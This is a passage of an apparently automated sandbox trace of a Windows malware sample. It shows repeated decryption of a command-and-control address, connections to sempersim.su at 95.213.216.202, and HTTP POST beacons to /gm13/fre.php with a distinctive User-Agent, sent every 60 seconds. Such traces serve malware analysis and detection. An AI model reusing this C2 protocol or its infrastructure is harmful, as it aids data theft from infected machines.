(lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0166.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.817] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0166.817] GetProcessHeap () returned 0x620000 [0166.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0166.818] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644120*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0166.819] GetProcessHeap () returned 0x620000 [0166.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0166.819] socket (af=2, type=1, protocol=6) returned 0x318 [0166.819] connect (s=0x318, name=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0166.889] FreeAddrInfoW (pAddrInfo=0x644120*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0166.889] GetProcessHeap () returned 0x620000 [0166.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0166.889] GetProcessHeap () returned 0x620000 [0166.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0166.890] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0166.891] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0166.891] GetProcessHeap () returned 0x620000 [0166.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0166.891] GetProcessHeap () returned 0x620000 [0166.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0166.891] GetProcessHeap () returned 0x620000 [0166.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0166.891] GetProcessHeap () returned 0x620000 [0166.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0166.892] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0166.893] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0166.893] GetProcessHeap () returned 0x620000 [0166.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0166.893] GetProcessHeap () returned 0x620000 [0166.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0166.893] send (s=0x318, buf=0x63a880*, len=237, flags=0) returned 237 [0166.894] send (s=0x318, buf=0x6421e0*, len=159, flags=0) returned 159 [0166.894] GetProcessHeap () returned 0x620000 [0166.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0166.894] recv (in: s=0x318, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0168.437] GetProcessHeap () returned 0x620000 [0168.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0168.438] GetProcessHeap () returned 0x620000 [0168.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0168.438] GetProcessHeap () returned 0x620000 [0168.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0168.439] GetProcessHeap () returned 0x620000 [0168.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0168.439] closesocket (s=0x318) returned 0 [0168.440] GetProcessHeap () returned 0x620000 [0168.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0168.441] GetProcessHeap () returned 0x620000 [0168.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0168.441] GetProcessHeap () returned 0x620000 [0168.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0168.442] GetProcessHeap () returned 0x620000 [0168.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0168.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x121c) returned 0x318 [0168.445] Sleep (dwMilliseconds=0xea60) [0168.449] GetProcessHeap () returned 0x620000 [0168.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0168.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.451] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0168.471] GetProcessHeap () returned 0x620000 [0168.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0168.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.472] CryptImportKey (in: hProv=0x63ba90, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0168.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.472] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.473] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.473] GetProcessHeap () returned 0x620000 [0168.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0168.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.475] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0168.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.475] CryptDestroyKey (hKey=0x62d190) returned 1 [0168.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.476] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0168.476] GetProcessHeap () returned 0x620000 [0168.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x628a78 [0168.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.477] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0168.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.478] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0168.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.479] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0168.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.484] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0168.484] GetProcessHeap () returned 0x620000 [0168.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0168.484] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0168.484] GetProcessHeap () returned 0x620000 [0168.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0168.484] GetProcessHeap () returned 0x620000 [0168.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628a78 | out: hHeap=0x620000) returned 1 [0168.485] GetProcessHeap () returned 0x620000 [0168.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0168.485] GetProcessHeap () returned 0x620000 [0168.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0168.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.495] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0168.502] GetProcessHeap () returned 0x620000 [0168.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0168.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.503] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0168.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.504] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.505] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.505] GetProcessHeap () returned 0x620000 [0168.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0168.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.507] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0168.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.508] CryptDestroyKey (hKey=0x62d190) returned 1 [0168.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0168.509] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0168.509] GetProcessHeap () returned 0x620000 [0168.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0168.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.510] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0168.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.511] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0168.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.514] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0168.514] GetProcessHeap () returned 0x620000 [0168.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0168.514] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644748*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0168.520] GetProcessHeap () returned 0x620000 [0168.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0168.520] socket (af=2, type=1, protocol=6) returned 0x31c [0168.520] connect (s=0x31c, name=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0168.571] FreeAddrInfoW (pAddrInfo=0x644748*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0168.571] GetProcessHeap () returned 0x620000 [0168.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0168.571] GetProcessHeap () returned 0x620000 [0168.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0168.571] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0168.572] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0168.572] GetProcessHeap () returned 0x620000 [0168.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0168.572] GetProcessHeap () returned 0x620000 [0168.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0168.573] GetProcessHeap () returned 0x620000 [0168.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435f0 [0168.573] GetProcessHeap () returned 0x620000 [0168.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0168.574] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0168.575] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0168.575] GetProcessHeap () returned 0x620000 [0168.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0168.575] GetProcessHeap () returned 0x620000 [0168.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0168.576] send (s=0x31c, buf=0x63a880*, len=237, flags=0) returned 237 [0168.577] send (s=0x31c, buf=0x6421e0*, len=159, flags=0) returned 159 [0168.577] GetProcessHeap () returned 0x620000 [0168.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0168.577] recv (in: s=0x31c, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0170.336] GetProcessHeap () returned 0x620000 [0170.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0170.337] GetProcessHeap () returned 0x620000 [0170.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0170.337] GetProcessHeap () returned 0x620000 [0170.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0170.337] GetProcessHeap () returned 0x620000 [0170.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0170.338] closesocket (s=0x31c) returned 0 [0170.339] GetProcessHeap () returned 0x620000 [0170.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0170.339] GetProcessHeap () returned 0x620000 [0170.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0170.340] GetProcessHeap () returned 0x620000 [0170.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0170.340] GetProcessHeap () returned 0x620000 [0170.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0170.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1200) returned 0x31c [0170.378] Sleep (dwMilliseconds=0xea60) [0170.405] GetProcessHeap () returned 0x620000 [0170.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0170.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0170.444] GetProcessHeap () returned 0x620000 [0170.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0170.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.446] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0170.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.452] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.454] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.454] GetProcessHeap () returned 0x620000 [0170.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0170.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.455] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0170.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.459] CryptDestroyKey (hKey=0x62d190) returned 1 [0170.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.460] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0170.460] GetProcessHeap () returned 0x620000 [0170.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0170.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.461] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.462] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.463] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.466] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.467] GetProcessHeap () returned 0x620000 [0170.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0170.467] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.467] GetProcessHeap () returned 0x620000 [0170.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0170.468] GetProcessHeap () returned 0x620000 [0170.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0170.468] GetProcessHeap () returned 0x620000 [0170.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0170.468] GetProcessHeap () returned 0x620000 [0170.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0170.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0170.485] GetProcessHeap () returned 0x620000 [0170.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0170.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.486] CryptImportKey (in: hProv=0x63ba08, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0170.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.487] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.488] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.488] GetProcessHeap () returned 0x620000 [0170.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0170.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.490] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0170.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.491] CryptDestroyKey (hKey=0x62d710) returned 1 [0170.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0170.492] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0170.492] GetProcessHeap () returned 0x620000 [0170.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0170.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.493] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0170.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.494] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0170.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.495] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0170.495] GetProcessHeap () returned 0x620000 [0170.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0170.495] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644798*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0170.499] GetProcessHeap () returned 0x620000 [0170.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0170.499] socket (af=2, type=1, protocol=6) returned 0x320 [0170.500] connect (s=0x320, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0170.565] FreeAddrInfoW (pAddrInfo=0x644798*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0170.565] GetProcessHeap () returned 0x620000 [0170.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0170.565] GetProcessHeap () returned 0x620000 [0170.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0170.566] LoadLibraryW 